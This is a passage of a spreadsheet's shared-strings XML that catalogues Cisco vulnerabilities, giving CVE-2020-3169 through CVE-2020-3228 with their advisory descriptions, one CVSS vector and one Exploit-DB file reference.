uld exploit this vulnerability by performing a high amount of login attempts against the affected device. A successful exploit could cause the affected device to become inaccessible to other users, resulting in a denial of service (DoS) condition requiring a manual power cycle of the VSM to recover.</t>
  </si>
  <si>
    <t>CVE-2020-3169</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying Linux operating system with a privilege level of root on an affected device. The vulnerability is due to insufficient validation of arguments passed to a specific CLI command on the affected device. An attacker could exploit this vulnerability by including malicious input as the argument of an affected command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system with root privileges. An attacker would need valid administrator credentials to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-3170</t>
  </si>
  <si>
    <t>A vulnerability in the NX-API feature of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause an NX-API system process to unexpectedly restart. The vulnerability is due to incorrect validation of the HTTP header of a request that is sent to the NX-API. An attacker could exploit this vulnerability by sending a crafted HTTP request to the NX-API on an affected device. A successful exploit could allow the attacker to cause a denial of service (DoS) condition in the NX-API service; however, the Cisco NX-OS device itself would still be available and passing network traffic. Note: The NX-API feature is disabled by default.</t>
  </si>
  <si>
    <t>CVE-2020-3171</t>
  </si>
  <si>
    <t>A vulnerability in the local management (local-mgmt) CLI of Cisco FXOS Software and Cisco UCS Manager Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system (OS) of an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by including crafted arguments to specific commands. A successful exploit could allow the attacker to execute arbitrary commands on the underlying OS with the privileges of the currently logged-in user for all affected platforms excluding Cisco UCS 6400 Series Fabric Interconnects. On Cisco UCS 6400 Series Fabric Interconnects, the injected commands are executed with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3172</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco Discovery Protocol feature of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to execute arbitrary code as root or cause a denial of service (DoS) condition on an affected device. The vulnerability exists because of insufficiently validated Cisco Discovery Protocol packet headers. An attacker could exploit this vulnerability by sending a crafted Cisco Discovery Protocol packet to a Layer 2-adjacent affected device. A successful exploit could allow the attacker to cause a buffer overflow that could allow the attacker to execute arbitrary code as root or cause a DoS condition on the affected device. Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Note: This vulnerability is different from the following Cisco FXOS and NX-OS Software Cisco Discovery Protocol vulnerabilities that Cisco announced on Feb. 5, 2020: Cisco FXOS, IOS XR, and NX-OS Software Cisco Discovery Protocol Denial of Service Vulnerability and Cisco NX-OS Software Cisco Discovery Protocol Remote Code Execution Vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-3173</t>
  </si>
  <si>
    <t>A vulnerability in the local management (local-mgmt) CLI of Cisco UCS Manager Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system (OS) on an affected device. The vulnerability is due to insufficient input validation of command arguments. An attacker could exploit this vulnerability by including crafted arguments to specific commands on the local management CLI. A successful exploit could allow the attacker to execute arbitrary commands on the underlying OS with the privileges of the currently logged-in user for all affected platforms excluding Cisco UCS 6400 Series Fabric Interconnects. On Cisco UCS 6400 Series Fabric Interconnects, the injected commands are executed with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3174</t>
  </si>
  <si>
    <t>A vulnerability in the anycast gateway feature of Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a device to learn invalid Address Resolution Protocol (ARP) entries. The ARP entries are for nonlocal IP addresses for the subnet. The vulnerability is due to improper validation of a received gratuitous ARP (GARP) request. An attacker could exploit this vulnerability by sending a malicious GARP packet on the local subnet to cause the ARP table on the device to become corrupted. A successful exploit could allow the attacker to populate the ARP table with incorrect entries, which could lead to traffic disruptions.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-3175</t>
  </si>
  <si>
    <t>A vulnerability in the resource handling system of Cisco NX-OS Software for Cisco MDS 9000 Series Multilayer Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper resource usage control. An attacker could exploit this vulnerability by sending traffic to the management interface (mgmt0) of an affected device at very high rates. An exploit could allow the attacker to cause unexpected behaviors such as high CPU usage, process crashes, or even full system reboots of an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3176</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Remote PHY Device Software could allow an authenticated, local attacker to execute commands on the underlying Linux shell of an affected device with root privileges. The vulnerability exists because the affected software does not properly sanitize user-supplied input. An attacker who has valid administrator access to an affected device could exploit this vulnerability by supplying certain CLI commands with crafted arguments. A successful exploit could allow the attacker to run arbitrary commands as the root user, which could result in a complete system compromise.</t>
  </si>
  <si>
    <t>CVE-2020-3177</t>
  </si>
  <si>
    <t>A vulnerability in the Tool for Auto-Registered Phones Support (TAPS) of Cisco Unified Communications Manager (UCM) and Cisco Unified Communications Manager Session Management Edition (SME) could allow an unauthenticated, remote attacker to conduct directory traversal attacks on an affected device. The vulnerability is due to insufficient validation of user-supplied input to the TAPS interface of the affected device. An attacker could exploit this vulnerability by sending a crafted request to the TAPS interface. A successful exploit could allow the attacker to read arbitrary files in the system.</t>
  </si>
  <si>
    <t>CVE-2020-3178</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based GUI of Cisco AsyncOS Software for Cisco Content Security Management Appliance (SMA) could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. The vulnerabilities are due to improper input validation of the parameters of an HTTP request. An attacker could exploit these vulnerabilities by intercepting an HTTP request and modifying it to redirect a user to a specific malicious URL. A successful exploit could allow the attacker to redirect a user to a malicious web page or to obtain sensitive browser-based information. This type of attack is commonly referred to as an open redirect attack and is used in phishing attacks to get users to unknowingly visit malicious sites.</t>
  </si>
  <si>
    <t>CVE-2020-3179</t>
  </si>
  <si>
    <t>A vulnerability in the generic routing encapsulation (GRE) tunnel decapsulation feature of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a memory handling error when GRE over IPv6 traffic is processed. An attacker could exploit this vulnerability by sending crafted GRE over IPv6 packets with either IPv4 or IPv6 payload through an affected device. A successful exploit could allow the attacker to cause the device to crash, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3180</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Solution Software could allow an unauthenticated, local attacker to access an affected device by using an account that has a default, static password. This account has root privileges. The vulnerability exists because the affected software has a user account with a default, static password. An attacker could exploit this vulnerability by remotely connecting to an affected system by using this account. A successful exploit could allow the attacker to log in by using this account with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3181</t>
  </si>
  <si>
    <t>A vulnerability in the malware detection functionality in Cisco Advanced Malware Protection (AMP) in Cisco AsyncOS Software for Cisco Email Security Appliances (ESAs) could allow an unauthenticated remote attacker to exhaust resources on an affected device. The vulnerability is due to insufficient control over system memory allocation. An attacker could exploit this vulnerability by sending a crafted email through the targeted device. A successful exploit could allow the attacker to cause an email attachment that contains malware to be delivered to a user and cause email processing delays.</t>
  </si>
  <si>
    <t>CVE-2020-3182</t>
  </si>
  <si>
    <t>A vulnerability in the multicast DNS (mDNS) protocol configuration of Cisco Webex Meetings Client for MacOS could allow an unauthenticated adjacent attacker to obtain sensitive information about the device on which the Webex client is running. The vulnerability exists because sensitive information is included in the mDNS reply. An attacker could exploit this vulnerability by doing an mDNS query for a particular service against an affected device. A successful exploit could allow the attacker to gain access to sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-3184</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Prime Collaboration Provisioning Software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability exists because the web-based management interface improperly validates user input for specific SQL queries. An attacker could exploit this vulnerability by authenticating to the application with valid administrative credentials and sending malicious requests to an affected system. A successful exploit could allow the attacker to view information that they are not authorized to view, make changes to the system that they are not authorized to make, or delete information from the database that they are not authorized to delete.</t>
  </si>
  <si>
    <t>CVE-2020-3185</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco TelePresence Management Suite (TMS) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by inserting malicious data in a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected web-based management interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3186</t>
  </si>
  <si>
    <t>A vulnerability in the management access list configuration of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured management interface access list on an affected system. The vulnerability is due to the configuration of different management access lists, with ports allowed in one access list and denied in another. An attacker could exploit this vulnerability by sending crafted remote management traffic to the local IP address of an affected system. A successful exploit could allow the attacker to bypass the configured management access list policies, and traffic to the management interface would not be properly denied.</t>
  </si>
  <si>
    <t>CVE-2020-3187</t>
  </si>
  <si>
    <t>A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences. An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48723.sh</t>
  </si>
  <si>
    <t>Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion</t>
  </si>
  <si>
    <t>2020-07-29</t>
  </si>
  <si>
    <t>CVE-2020-3188</t>
  </si>
  <si>
    <t>A vulnerability in how Cisco Firepower Threat Defense (FTD) Software handles session timeouts for management connections could allow an unauthenticated, remote attacker to cause a buildup of remote management connections to an affected device, which could result in a denial of service (DoS) condition. The vulnerability exists because the default session timeout period for specific to-the-box remote management connections is too long. An attacker could exploit this vulnerability by sending a large and sustained number of crafted remote management connections to an affected device, resulting in a buildup of those connections over time. A successful exploit could allow the attacker to cause the remote management interface or Cisco Firepower Device Manager (FDM) to stop responding and cause other management functions to go offline, resulting in a DoS condition. The user traffic that is flowing through the device would not be affected, and the DoS condition would be isolated to remote management only.</t>
  </si>
  <si>
    <t>CVE-2020-3189</t>
  </si>
  <si>
    <t>A vulnerability in the VPN System Logging functionality for Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a memory leak that can deplete system memory over time, which can cause unexpected system behaviors or device crashes. The vulnerability is due to the system memory not being properly freed for a VPN System Logging event generated when a VPN session is created or deleted. An attacker could exploit this vulnerability by repeatedly creating or deleting a VPN tunnel connection, which could leak a small amount of system memory for each logging event. A successful exploit could allow the attacker to cause system memory depletion, which can lead to a systemwide denial of service (DoS) condition. The attacker does not have any control of whether VPN System Logging is configured or not on the device, but it is enabled by default.</t>
  </si>
  <si>
    <t>CVE-2020-3190</t>
  </si>
  <si>
    <t>A vulnerability in the IPsec packet processor of Cisco IOS XR Software could allow an unauthenticated remote attacker to cause a denial of service (DoS) condition for IPsec sessions to an affected device. The vulnerability is due to improper handling of packets by the IPsec packet processor. An attacker could exploit this vulnerability by sending malicious ICMP error messages to an affected device that get punted to the IPsec packet processor. A successful exploit could allow the attacker to deplete IPsec memory, resulting in all future IPsec packets to an affected device being dropped by the device. Manual intervention is required to recover from this situation.</t>
  </si>
  <si>
    <t>CVE-2020-3191</t>
  </si>
  <si>
    <t>A vulnerability in DNS over IPv6 packet processing for Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to unexpectedly reload, resulting in a denial of service (DoS) condition. The vulnerability is due to improper length validation of a field in an IPv6 DNS packet. An attacker could exploit this vulnerability by sending a crafted DNS query over IPv6, which traverses the affected device. An exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. This vulnerability is specific to DNS over IPv6 traffic only.</t>
  </si>
  <si>
    <t>CVE-2020-3192</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3193</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to obtain sensitive information about an affected device. The vulnerability exists because replies from the web-based management interface include unnecessary server information. An attacker could exploit this vulnerability by inspecting replies received from the web-based management interface. A successful exploit could allow the attacker to obtain details about the operating system, including the web server version that is running on the device, which could be used to perform further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-3194</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Network Recording Player for Microsoft Windows and Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exists due to insufficient validation of certain elements with a Webex recording stored in either the Advanced Recording Format (ARF) or the Webex Recording Format (WRF). An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user.</t>
  </si>
  <si>
    <t>CVE-2020-3195</t>
  </si>
  <si>
    <t>A vulnerability in the Open Shortest Path First (OSPF) implementation in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a memory leak on an affected device. The vulnerability is due to incorrect processing of certain OSPF packets. An attacker could exploit this vulnerability by sending a series of crafted OSPF packets to be processed by an affected device. A successful exploit could allow the attacker to continuously consume memory on an affected device and eventually cause it to reload, resulting in a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-3196</t>
  </si>
  <si>
    <t>A vulnerability in the Secure Sockets Layer (SSL)/Transport Layer Security (TLS) handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to exhaust memory resources on the affected device, leading to a denial of service (DoS) condition. The vulnerability is due to improper resource management for inbound SSL/TLS connections. An attacker could exploit this vulnerability by establishing multiple SSL/TLS connections with specific conditions to the affected device. A successful exploit could allow the attacker to exhaust the memory on the affected device, causing the device to stop accepting new SSL/TLS connections and resulting in a DoS condition for services on the device that process SSL/TLS traffic. Manual intervention is required to recover an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3197</t>
  </si>
  <si>
    <t>A vulnerability in the API subsystem of Cisco Meetings App could allow an unauthenticated, remote attacker to retain and reuse the Traversal Using Relay NAT (TURN) server credentials that are configured in an affected system. The vulnerability is due to insufficient protection mechanisms for the TURN server credentials. An attacker could exploit this vulnerability by intercepting the legitimate traffic that is generated by an affected system. An exploit could allow the attacker to obtain the TURN server credentials, which the attacker could use to place audio/video calls and forward packets through the configured TURN server. The attacker would not be able to take control of the TURN server unless the same credentials were used in multiple systems.</t>
  </si>
  <si>
    <t>CVE-2020-3198</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an unauthenticated, remote attacker or an authenticated, local attacker to execute arbitrary code on an affected system or cause an affected system to crash and reload. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3199</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the Cisco IOx application environment of Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) that are running Cisco IOS Software could allow an attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3200</t>
  </si>
  <si>
    <t>A vulnerability in the Secure Shell (SSH) server code of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker to cause an affected device to reload. The vulnerability is due to an internal state not being represented correctly in the SSH state machine, which leads to an unexpected behavior. An attacker could exploit this vulnerability by creating an SSH connection to an affected device and using a specific traffic pattern that causes an error condition within that connection. A successful exploit could allow an attacker to cause the device to reload, resulting in a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-3201</t>
  </si>
  <si>
    <t>A vulnerability in the Tool Command Language (Tcl) interpreter of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, local attacker with privileged EXEC credentials to cause a denial of service (DoS) condition on an affected system. The vulnerability is due to insufficient input validation of data passed to the Tcl interpreter. An attacker could exploit this vulnerability by executing crafted Tcl arguments on an affected device. An exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3203</t>
  </si>
  <si>
    <t>A vulnerability in the locally significant certificate (LSC) provisioning feature of Cisco Catalyst 9800 Series Wireless Controllers that are running Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a memory leak that could lead to a denial of service (DoS) condition. The vulnerability is due to incorrect processing of certain public key infrastructure (PKI) packets. An attacker could exploit this vulnerability by sending crafted Secure Sockets Layer (SSL) packets to an affected device. A successful exploit could cause an affected device to continuously consume memory, which could result in a memory allocation failure that leads to a crash and causes a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3204</t>
  </si>
  <si>
    <t>A vulnerability in the Tool Command Language (Tcl) interpreter of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, local attacker with privileged EXEC credentials to execute arbitrary code on the underlying operating system (OS) with root privileges. The vulnerability is due to insufficient input validation of data passed to the Tcl interpreter. An attacker could exploit this vulnerability by loading malicious Tcl code on an affected device. A successful exploit could allow the attacker to cause memory corruption or execute the code with root privileges on the underlying OS of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3205</t>
  </si>
  <si>
    <t>A vulnerability in the implementation of the inter-VM channel of Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an unauthenticated, adjacent attacker to execute arbitrary shell commands on the Virtual Device Server (VDS) of an affected device. The vulnerability is due to insufficient validation of signaling packets that are destined to VDS. An attacker could exploit this vulnerability by sending malicious packets to an affected device. A successful exploit could allow the attacker to execute arbitrary commands in the context of the Linux shell of VDS with the privileges of the root user. Because the device is designed on a hypervisor architecture, exploitation of a vulnerability that affects the inter-VM channel may lead to a complete system compromise. For more information about this vulnerability, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3206</t>
  </si>
  <si>
    <t>A vulnerability in the handling of IEEE 802.11w Protected Management Frames (PMFs) of Cisco Catalyst 9800 Series Wireless Controllers that are running Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to terminate a valid user connection to an affected device. The vulnerability exists because the affected software does not properly validate 802.11w disassociation and deauthentication PMFs that it receives. An attacker could exploit this vulnerability by sending a spoofed 802.11w PMF from a valid, authenticated client on a network adjacent to an affected device. A successful exploit could allow the attacker to terminate a single valid user connection to the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3207</t>
  </si>
  <si>
    <t>A vulnerability in the processing of boot options of specific Cisco IOS XE Software switches could allow an authenticated, local attacker with root shell access to the underlying operating system (OS) to conduct a command injection attack during device boot. This vulnerability is due to insufficient input validation checks while processing boot options. An attacker could exploit this vulnerability by modifying device boot options to execute attacker-provided code. A successful exploit may allow an attacker to bypass the Secure Boot process and execute malicious code on an affected device with root-level privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3208</t>
  </si>
  <si>
    <t>A vulnerability in the image verification feature of Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) could allow an authenticated, local attacker to boot a malicious software image on an affected device. The vulnerability is due to insufficient access restrictions on the area of code that manages the image verification feature. An attacker could exploit this vulnerability by first authenticating to the targeted device and then logging in to the Virtual Device Server (VDS) of an affected device. The attacker could then, from the VDS shell, disable Cisco IOS Software integrity (image) verification. A successful exploit could allow the attacker to boot a malicious Cisco IOS Software image on the targeted device. To exploit this vulnerability, the attacker must have valid user credentials at privilege level 15.</t>
  </si>
  <si>
    <t>CVE-2020-3209</t>
  </si>
  <si>
    <t>A vulnerability in software image verification in Cisco IOS XE Software could allow an unauthenticated, physical attacker to install and boot a malicious software image or execute unsigned binaries on an affected device. The vulnerability is due to an improper check on the area of code that manages the verification of the digital signatures of system image files during the initial boot process. An attacker could exploit this vulnerability by loading unsigned software on an affected device. A successful exploit could allow the attacker to install and boot a malicious software image or execute unsigned binaries on the targeted device.</t>
  </si>
  <si>
    <t>CVE-2020-3210</t>
  </si>
  <si>
    <t>A vulnerability in the CLI parsers of Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an authenticated, local attacker to execute arbitrary shell commands on the Virtual Device Server (VDS) of an affected device. The attacker must have valid user credentials at privilege level 15. The vulnerability is due to insufficient validation of arguments that are passed to specific VDS-related CLI commands. An attacker could exploit this vulnerability by authenticating to the targeted device and including malicious input as the argument of an affected command. A successful exploit could allow the attacker to execute arbitrary commands in the context of the Linux shell of VDS with the privileges of the root user.</t>
  </si>
  <si>
    <t>CVE-2020-3211</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco IOS XE Software could allow an authenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system of an affected device. The vulnerability is due to improper input sanitization. An attacker who has valid administrative access to an affected device could exploit this vulnerability by supplying a crafted input parameter on a form in the web UI and then submitting that form. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the device, which could lead to complete system compromise.</t>
  </si>
  <si>
    <t>CVE-2020-3212</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco IOS XE Software could allow an authenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system of an affected device. The vulnerability is due to improper input sanitization. An attacker could exploit this vulnerability by uploading a crafted file to the web UI of an affected device. A successful exploit could allow the attacker to inject and execute arbitrary commands with root privileges on the device.</t>
  </si>
  <si>
    <t>CVE-2020-3213</t>
  </si>
  <si>
    <t>A vulnerability in the ROMMON of Cisco IOS XE Software could allow an authenticated, local attacker to elevate privileges to those of the root user of the underlying operating system. The vulnerability is due to the ROMMON allowing for special parameters to be passed to the device at initial boot up. An attacker could exploit this vulnerability by sending parameters to the device at initial boot up. An exploit could allow the attacker to elevate from a Priv15 user to the root user and execute arbitrary commands with the privileges of the root user.</t>
  </si>
  <si>
    <t>CVE-2020-3214</t>
  </si>
  <si>
    <t>A vulnerability in Cisco IOS XE Software could allow an authenticated, local attacker to escalate their privileges to a user with root-level privileges. The vulnerability is due to insufficient validation of user-supplied content. This vulnerability could allow an attacker to load malicious software onto an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3215</t>
  </si>
  <si>
    <t>A vulnerability in the Virtual Services Container of Cisco IOS XE Software could allow an authenticated, local attacker to gain root-level privileges on an affected device. The vulnerability is due to insufficient validation of a user-supplied open virtual appliance (OVA). An attacker could exploit this vulnerability by installing a malicious OVA on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3216</t>
  </si>
  <si>
    <t>A vulnerability in Cisco IOS XE SD-WAN Software could allow an unauthenticated, physical attacker to bypass authentication and gain unrestricted access to the root shell of an affected device. The vulnerability exists because the affected software has insufficient authentication mechanisms for certain commands. An attacker could exploit this vulnerability by stopping the boot initialization of an affected device. A successful exploit could allow the attacker to bypass authentication and gain unrestricted access to the root shell of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3217</t>
  </si>
  <si>
    <t>A vulnerability in the Topology Discovery Service of Cisco One Platform Kit (onePK) in Cisco IOS Software, Cisco IOS XE Software, Cisco IOS XR Software, and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient length restrictions when the onePK Topology Discovery Service parses Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol message to an affected device. An exploit could allow the attacker to cause a stack overflow, which could allow the attacker to execute arbitrary code with administrative privileges, or to cause a process crash, which could result in a reload of the device and cause a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3218</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco IOS XE Software could allow an authenticated, remote attacker with administrative privileges to execute arbitrary code with root privileges on the underlying Linux shell. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by first creating a malicious file on the affected device itself and then uploading a second malicious file to the device. A successful exploit could allow the attacker to execute arbitrary code with root privileges or bypass licensing requirements on the device.</t>
  </si>
  <si>
    <t>CVE-2020-3219</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco IOS XE Software could allow an authenticated, remote attacker to inject and execute arbitrary commands with administrative privileges on the underlying operating system of an affected device. The vulnerability is due to insufficient validation of user-supplied input to the web UI. An attacker could exploit this vulnerability by submitting crafted input to the web UI. A successful exploit could allow an attacker to execute arbitrary commands with administrative privileges on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3220</t>
  </si>
  <si>
    <t>A vulnerability in the hardware crypto driver of Cisco IOS XE Software for Cisco 4300 Series Integrated Services Routers and Cisco Catalyst 9800-L Wireless Controllers could allow an unauthenticated, remote attacker to disconnect legitimate IPsec VPN sessions to an affected device. The vulnerability is due to insufficient verification of authenticity of received Encapsulating Security Payload (ESP) packets. An attacker could exploit this vulnerability by tampering with ESP cleartext values as a man-in-the-middle.</t>
  </si>
  <si>
    <t>CVE-2020-3221</t>
  </si>
  <si>
    <t>A vulnerability in the Flexible NetFlow Version 9 packet processor of Cisco IOS XE Software for Cisco Catalyst 9800 Series Wireless Controllers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper validation of parameters in a Flexible NetFlow Version 9 record. An attacker could exploit this vulnerability by sending a malformed Flexible NetFlow Version 9 packet to the Control and Provisioning of Wireless Access Points (CAPWAP) data port of an affected device. An exploit could allow the attacker to trigger an infinite loop, resulting in a process crash that would cause a reload of the device.</t>
  </si>
  <si>
    <t>CVE-2020-3222</t>
  </si>
  <si>
    <t>A vulnerability in the web-based user interface (web UI) of Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to bypass access control restrictions on an affected device. The vulnerability is due to the presence of a proxy service at a specific endpoint of the web UI. An attacker could exploit this vulnerability by connecting to the proxy service. An exploit could allow the attacker to bypass access restrictions on the network by proxying their access request through the management network of the affected device. As the proxy is reached over the management virtual routing and forwarding (VRF), this could reduce the effectiveness of the bypass.</t>
  </si>
  <si>
    <t>CVE-2020-3223</t>
  </si>
  <si>
    <t>A vulnerability in the web-based user interface (web UI) of Cisco IOS XE Software could allow an authenticated, remote attacker with administrative privileges to read arbitrary files on the underlying filesystem of the device. The vulnerability is due to insufficient file scope limiting. An attacker could exploit this vulnerability by creating a specific file reference on the filesystem and then accessing it through the web UI. An exploit could allow the attacker to read arbitrary files from the underlying operating system's filesystem.</t>
  </si>
  <si>
    <t>CVE-2020-3224</t>
  </si>
  <si>
    <t>A vulnerability in the web-based user interface (web UI) of Cisco IOS XE Software could allow an authenticated, remote attacker with read-only privileges to inject IOS commands to an affected device. The injected commands should require a higher privilege level in order to be executed. The vulnerability is due to insufficient input validation of specific HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to a specific web UI endpoint on an affected device. A successful exploit could allow the attacker to inject IOS commands to the affected device, which could allow the attacker to alter the configuration of the device or cause a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-3225</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the implementation of the Common Industrial Protocol (CIP) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerabilities are due to insufficient input processing of CIP traffic. An attacker could exploit these vulnerabilities by sending crafted CIP traffic to be processed by an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3226</t>
  </si>
  <si>
    <t>A vulnerability in the Session Initiation Protocol (SIP) library of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient sanity checks on received SIP messages. An attacker could exploit this vulnerability by sending crafted SIP messages to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-3227</t>
  </si>
  <si>
    <t>A vulnerability in the authorization controls for the Cisco IOx application hosting infrastructure in Cisco IOS XE Software could allow an unauthenticated, remote attacker to execute Cisco IOx API commands without proper authorization. The vulnerability is due to incorrect handling of requests for authorization tokens. An attacker could exploit this vulnerability by using a crafted API call to request such a token. An exploit could allow the attacker to obtain an authorization token and execute any of the IOx API commands on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3228</t>
  </si>
  <si>
